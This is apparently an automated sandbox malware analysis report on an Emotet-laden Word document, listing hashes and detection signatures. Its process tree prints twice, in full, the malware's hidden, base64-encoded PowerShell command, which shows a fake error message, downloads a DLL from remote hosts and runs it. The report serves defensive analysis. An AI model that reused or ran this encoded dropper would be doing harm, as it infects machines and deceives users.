Loading ...

Play interactive tourEdit tour

Analysis Report Informacion_4-09757.doc

Overview

General Information

Sample Name:Informacion_4-09757.doc
Analysis ID:336961
MD5:4adc5e8e53a40fd14ff90e99e94e39cb
SHA1:406d00f10a2298acfe192fb85e870d5e5d094263
SHA256:1c29c870c5c27cec2f22790ecc87e0c1c1ae59bd4e5c8204ec9182524d68d68f

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2388 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2432 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAcgAnACkAKQArACgAKAAnAFIAJwArACcAdwBSAHoAJwArACcAYwBKACkAKAAzAHMAMgApACgAQAAnACsAJwBoAHQAJwArACcAdAAnACkAKQArACgAKAAnAHAAOgBKACcAKwAnACkAKAAnACkAKQArACcAMwBzACcAKwAnADIAJwArACgAKAAnACkAKABKACkAJwArACcAKAAnACkAKQArACgAJwAzAHMAJwArACcAMgAnACkAKwAoACgAJwApACgAagBvACcAKwAnAHMAZQBnACcAKwAnAGUAJwArACcAbgBlAC4AYwAnACkAKQArACgAJwBvACcAKwAnAG0ASgAnACkAKwAoACgAJwApACgAMwBzACcAKwAnADIAKQAoAHQAJwArACcAaAAnACkAKQArACcAZQBtACcAKwAoACgAJwBlAEoAKQAoADMAJwArACcAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoACcAKwAnAGcAVQA4AEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAQABoAHQAdAAnACkAKQArACgAKAAnAHAAJwArACcAOgBKACkAJwApACkAKwAnACgAJwArACgAKAAnADMAcwAnACsAJwAyACkAKABKACcAKwAnACkAKAAzAHMAJwApACkAKwAoACgAJwAyACkAKABwAGEAJwArACcAdQBsACcAKwAnAHMAJwApACkAKwAoACcAYwBvACcAKwAnAG0AcAAnACkAKwAoACcAdQB0AGkAJwArACcAbgAnACkAKwAoACcAZwAuAGMAJwArACcAbwAnACkAKwAoACgAJwBtACcAKwAnAEoAKQAoADMAcwAyACkAKAAnACkAKQArACgAJwBDACcAKwAnAHIAYQBpACcAKQArACgAJwBnACcAKwAnAHMATQAnACkAKwAnAGEAZwAnACsAKAAnAGkAYwBTAHEAJwArACcAdQBhAHIAZQAnACkAKwAoACgAJwBKACkAJwArACcAKAAzAHMAMgApACgASAAnACsAJwBKACcAKwAnACkAKAAnACkAKQArACgAKAAnADMAJwArACcAcwAyACkAKAAnACkAKQArACcAQAAnACsAJwBoAHQAJwArACgAJwB0ACcAKwAnAHAAcwAnACkAKwAnADoAJwArACgAKAAnAEoAKQAnACsAJwAoACcAKQApACsAKAAnADMAJwArACcAcwAyACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAyACcAKwAnACkAKAAnACsAJwBnAG8AJwArACcAbABkAGkAbABvAGMAawAnACkAKQArACgAJwBzACcAKwAnAHQAcgAnACkAKwAoACcAYQAnACsAJwBpAG4AaQAnACkAKwAoACgAJwBuAGcAJwArACcALgAnACsAJwBjAG8AbQBKACkAKAAnACsAJwAzACcAKQApACsAKAAoACcAcwAyACkAJwArACcAKAAnACkAKQArACgAJwB3AHAAJwArACcALQAnACkAKwAoACcAaQAnACsAJwBuAGMAJwApACsAKAAnAGwAJwArACcAdQBkACcAKQArACgAJwBlAHMAJwArACcASgAnACkAKwAnACkAJwArACcAKAAnACsAKAAoACcAMwBzADIAKQAnACsAJwAoACcAKwAnAGIAZgB0AHQAJwApACkAKwAoACgAJwBKACkAKAAnACsAJwAzAHMAJwApACkAKwAnADIAJwArACgAKAAnACkAKAAnACsAJwBAAGgAdAAnACkAKQArACgAKAAnAHQAcABzADoAJwArACcASgApACcAKQApACsAKAAoACcAKAAzAHMAJwArACcAMgApACgASgAnACsAJwApACgAMwBzACcAKQApACsAKAAoACcAMgApACgAagAnACsAJwBlAGYAZgBkACcAKwAnAGEAaABsACcAKQApACsAKAAoACcAawBlAC4AJwArACcAYwBvAG0AJwArACcASgAnACsAJwApACgAMwBzADIAKQAoACcAKQApACsAKAAoACcAYwBzAHMASgAnACsAJwApACcAKQApACsAKAAnACgAMwBzADIAJwArACcAKQAnACkAKwAoACgAJwAoAGIAZwA0AG4AMwAnACsAJwBKACkAKAAnACkAKQArACcAMwAnACsAKAAoACcAcwAyACkAJwArACcAKABAAGgAdAAnACsAJwB0AHAAJwArACcAOgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgASgApACgAJwArACcAMwBzADIAKQAoACcAKQApACsAKAAnAGEAegAnACsAJwByAGEAJwArACcAawB0AG8AJwApACsAJwB1ACcAKwAoACcAcgBzACcAKwAnAC4AYwBvACcAKwAnAG0AJwApACsAKAAoACcASgAnACsAJwApACgAJwApACkAKwAoACgAJwAzAHMAJwArACcAMgApACgAJwApACkAKwAoACcAdwAnACsAJwBwAC0AYwAnACsAJwBvAG4AdABlACcAKQArACcAbgAnACsAJwB0AEoAJwArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAKAAnACsAJwBOAFcARgAnACkAKQArACgAKAAnADkAagAnACsAJwBDAEoAKQAnACkAKQArACgAKAAnACgAJwArACcAMwBzADIAKQAoACcAKwAnAEAAJwArACcAaAB0AHQAcAAnACkAKQArACgAKAAnADoASgApACcAKwAnACgAMwAnACsAJwBzADIAJwApACkAKwAoACgAJwApACgASgAnACsAJwApACgAMwAnACkAKQArACcAcwAyACcAKwAoACgAJwApACgAJwApACkAKwAoACcAZwBvAGwAZABjAG8AJwArACcAYQBzACcAKQArACgAJwB0AG8AZgAnACsAJwBmACcAKQArACgAJwBpAGMAJwArACcAZQAzADYANQAnACsAJwAuAGMAbwAnACkAKwAoACgAJwBtAEoAJwArACcAKQAoACcAKQApACsAJwAzAHMAJwArACgAKAAnADIAKQAoAHQAZQBtAHAAJwArACcASgApACgAMwAnACsAJwBzADIAKQAoAFgASgApACcAKwAnACgAMwBzACcAKQApACsAKAAoACcAMgAnACsAJwApACgAJwApACkAKQApAC4AIgBSAGUAYABwAGAAbABhAGMARQAiACgAKAAoACcASgAnACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoACcAKQApACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAaAB3ACcAKwAnAGUAJwApACkAWwAwAF0AKQAuACIAcwBgAHAAbABJAHQAIgAoACQAQwBkADkAcwB4ADMAYwAgACsAIAAkAEMANgA3AHkAdgBwAF8AIAArACAAJABRAGgAaABoADcAZQBpACkAOwAkAEQAYQA4AHMAaQA0ADAAPQAoACcATQAzACcAKwAoACcAeQB3AG4ANwAnACsAJwByACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABLADQAYwBlAGoAawBqACAAaQBuACAAJABDAGsAOAAxAHgAeAAyACAAfAAgAFMAbwByAFQAYAAtAG8AYgBqAGUAYABjAFQAIAB7AEcARQBUAGAALQBgAFIAYABBAE4AZABvAE0AfQApAHsAdAByAHkAewAkAE4AbQA5AGQAYwB0AG4ALgAiAEQAbwBXAGAATgBMAGAAbwBBAGQAZgBgAGkAbABlACIAKAAkAEsANABjAGUAagBrAGoALAAgACQAUABpADkAbgB5AGYAcQApADsAJABJAGYAagBpAF8AcwA1AD0AKAAnAFQAMgAnACsAJwAwACcAKwAoACcAYwAyAHoAJwArACcAZQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdAAnACsAJwBlAG0AJwApACAAJABQAGkAOQBuAHkAZgBxACkALgAiAGwARQBgAE4ARwBUAGgAIgAgAC0AZwBlACAAMwA1ADUANgA5ACkAIAB7AC4AKAAnAHIAdQAnACsAJwBuAGQAJwArACcAbABsADMAMgAnACkAIAAkAFAAaQA5AG4AeQBmAHEALAAnACMAMQAnAC4AIgBUAE8AUwBgAFQAUgBgAEkATgBnACIAKAApADsAJABKAGIAZgBhAGYAdwBsAD0AKAAnAEUAYQAnACsAJwA3AGQAJwArACgAJwByAG4AJwArACcAMwAnACkAKQA7AGIAcgBlAGEAawA7ACQASgA4ADIANwBhADYAdwA9ACgAJwBVACcAKwAoACcAMgBzADYAOABiACcAKwAnADQAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAMwBhADUAbAA1AGcAPQAoACgAJwBZACcAKwAnAGQANQBzADkAJwApACsAJwBhAGsAJwApAA== MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 1628 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 1692 cmdline: POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAcgAnACkAKQArACgAKAAnAFIAJwArACcAdwBSAHoAJwArACcAYwBKACkAKAAzAHMAMgApACgAQAAnACsAJwBoAHQAJwArACcAdAAnACkAKQArACgAKAAnAHAAOgBKACcAKwAnACkAKAAnACkAKQArACcAMwBzACcAKwAnADIAJwArACgAKAAnACkAKABKACkAJwArACcAKAAnACkAKQArACgAJwAzAHMAJwArACcAMgAnACkAKwAoACgAJwApACgAagBvACcAKwAnAHMAZQBnACcAKwAnAGUAJwArACcAbgBlAC4AYwAnACkAKQArACgAJwBvACcAKwAnAG0ASgAnACkAKwAoACgAJwApACgAMwBzACcAKwAnADIAKQAoAHQAJwArACcAaAAnACkAKQArACcAZQBtACcAKwAoACgAJwBlAEoAKQAoADMAJwArACcAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoACcAKwAnAGcAVQA4AEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAQABoAHQAdAAnACkAKQArACgAKAAnAHAAJwArACcAOgBKACkAJwApACkAKwAnACgAJwArACgAKAAnADMAcwAnACsAJwAyACkAKABKACcAKwAnACkAKAAzAHMAJwApACkAKwAoACgAJwAyACkAKABwAGEAJwArACcAdQBsACcAKwAnAHMAJwApACkAKwAoACcAYwBvACcAKwAnAG0AcAAnACkAKwAoACcAdQB0AGkAJwArACcAbgAnACkAKwAoACcAZwAuAGMAJwArACcAbwAnACkAKwAoACgAJwBtACcAKwAnAEoAKQAoADMAcwAyACkAKAAnACkAKQArACgAJwBDACcAKwAnAHIAYQBpACcAKQArACgAJwBnACcAKwAnAHMATQAnACkAKwAnAGEAZwAnACsAKAAnAGkAYwBTAHEAJwArACcAdQBhAHIAZQAnACkAKwAoACgAJwBKACkAJwArACcAKAAzAHMAMgApACgASAAnACsAJwBKACcAKwAnACkAKAAnACkAKQArACgAKAAnADMAJwArACcAcwAyACkAKAAnACkAKQArACcAQAAnACsAJwBoAHQAJwArACgAJwB0ACcAKwAnAHAAcwAnACkAKwAnADoAJwArACgAKAAnAEoAKQAnACsAJwAoACcAKQApACsAKAAnADMAJwArACcAcwAyACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAyACcAKwAnACkAKAAnACsAJwBnAG8AJwArACcAbABkAGkAbABvAGMAawAnACkAKQArACgAJwBzACcAKwAnAHQAcgAnACkAKwAoACcAYQAnACsAJwBpAG4AaQAnACkAKwAoACgAJwBuAGcAJwArACcALgAnACsAJwBjAG8AbQBKACkAKAAnACsAJwAzACcAKQApACsAKAAoACcAcwAyACkAJwArACcAKAAnACkAKQArACgAJwB3AHAAJwArACcALQAnACkAKwAoACcAaQAnACsAJwBuAGMAJwApACsAKAAnAGwAJwArACcAdQBkACcAKQArACgAJwBlAHMAJwArACcASgAnACkAKwAnACkAJwArACcAKAAnACsAKAAoACcAMwBzADIAKQAnACsAJwAoACcAKwAnAGIAZgB0AHQAJwApACkAKwAoACgAJwBKACkAKAAnACsAJwAzAHMAJwApACkAKwAnADIAJwArACgAKAAnACkAKAAnACsAJwBAAGgAdAAnACkAKQArACgAKAAnAHQAcABzADoAJwArACcASgApACcAKQApACsAKAAoACcAKAAzAHMAJwArACcAMgApACgASgAnACsAJwApACgAMwBzACcAKQApACsAKAAoACcAMgApACgAagAnACsAJwBlAGYAZgBkACcAKwAnAGEAaABsACcAKQApACsAKAAoACcAawBlAC4AJwArACcAYwBvAG0AJwArACcASgAnACsAJwApACgAMwBzADIAKQAoACcAKQApACsAKAAoACcAYwBzAHMASgAnACsAJwApACcAKQApACsAKAAnACgAMwBzADIAJwArACcAKQAnACkAKwAoACgAJwAoAGIAZwA0AG4AMwAnACsAJwBKACkAKAAnACkAKQArACcAMwAnACsAKAAoACcAcwAyACkAJwArACcAKABAAGgAdAAnACsAJwB0AHAAJwArACcAOgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgASgApACgAJwArACcAMwBzADIAKQAoACcAKQApACsAKAAnAGEAegAnACsAJwByAGEAJwArACcAawB0AG8AJwApACsAJwB1ACcAKwAoACcAcgBzACcAKwAnAC4AYwBvACcAKwAnAG0AJwApACsAKAAoACcASgAnACsAJwApACgAJwApACkAKwAoACgAJwAzAHMAJwArACcAMgApACgAJwApACkAKwAoACcAdwAnACsAJwBwAC0AYwAnACsAJwBvAG4AdABlACcAKQArACcAbgAnACsAJwB0AEoAJwArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAKAAnACsAJwBOAFcARgAnACkAKQArACgAKAAnADkAagAnACsAJwBDAEoAKQAnACkAKQArACgAKAAnACgAJwArACcAMwBzADIAKQAoACcAKwAnAEAAJwArACcAaAB0AHQAcAAnACkAKQArACgAKAAnADoASgApACcAKwAnACgAMwAnACsAJwBzADIAJwApACkAKwAoACgAJwApACgASgAnACsAJwApACgAMwAnACkAKQArACcAcwAyACcAKwAoACgAJwApACgAJwApACkAKwAoACcAZwBvAGwAZABjAG8AJwArACcAYQBzACcAKQArACgAJwB0AG8AZgAnACsAJwBmACcAKQArACgAJwBpAGMAJwArACcAZQAzADYANQAnACsAJwAuAGMAbwAnACkAKwAoACgAJwBtAEoAJwArACcAKQAoACcAKQApACsAJwAzAHMAJwArACgAKAAnADIAKQAoAHQAZQBtAHAAJwArACcASgApACgAMwAnACsAJwBzADIAKQAoAFgASgApACcAKwAnACgAMwBzACcAKQApACsAKAAoACcAMgAnACsAJwApACgAJwApACkAKQApAC4AIgBSAGUAYABwAGAAbABhAGMARQAiACgAKAAoACcASgAnACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoACcAKQApACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAaAB3ACcAKwAnAGUAJwApACkAWwAwAF0AKQAuACIAcwBgAHAAbABJAHQAIgAoACQAQwBkADkAcwB4ADMAYwAgACsAIAAkAEMANgA3AHkAdgBwAF8AIAArACAAJABRAGgAaABoADcAZQBpACkAOwAkAEQAYQA4AHMAaQA0ADAAPQAoACcATQAzACcAKwAoACcAeQB3AG4ANwAnACsAJwByACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABLADQAYwBlAGoAawBqACAAaQBuACAAJABDAGsAOAAxAHgAeAAyACAAfAAgAFMAbwByAFQAYAAtAG8AYgBqAGUAYABjAFQAIAB7AEcARQBUAGAALQBgAFIAYABBAE4AZABvAE0AfQApAHsAdAByAHkAewAkAE4AbQA5AGQAYwB0AG4ALgAiAEQAbwBXAGAATgBMAGAAbwBBAGQAZgBgAGkAbABlACIAKAAkAEsANABjAGUAagBrAGoALAAgACQAUABpADkAbgB5AGYAcQApADsAJABJAGYAagBpAF8AcwA1AD0AKAAnAFQAMgAnACsAJwAwACcAKwAoACcAYwAyAHoAJwArACcAZQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdAAnACsAJwBlAG0AJwApACAAJABQAGkAOQBuAHkAZgBxACkALgAiAGwARQBgAE4ARwBUAGgAIgAgAC0AZwBlACAAMwA1ADUANgA5ACkAIAB7AC4AKAAnAHIAdQAnACsAJwBuAGQAJwArACcAbABsADMAMgAnACkAIAAkAFAAaQA5AG4AeQBmAHEALAAnACMAMQAnAC4AIgBUAE8AUwBgAFQAUgBgAEkATgBnACIAKAApADsAJABKAGIAZgBhAGYAdwBsAD0AKAAnAEUAYQAnACsAJwA3AGQAJwArACgAJwByAG4AJwArACcAMwAnACkAKQA7AGIAcgBlAGEAawA7ACQASgA4ADIANwBhADYAdwA9ACgAJwBVACcAKwAoACcAMgBzADYAOABiACcAKwAnADQAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAMwBhADUAbAA1AGcAPQAoACgAJwBZACcAKwAnAGQANQBzADkAJwApACsAJwBhAGsAJwApAA== MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2516 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1 MD5: DD81D91FF3B0763C392422865C9AC12E)
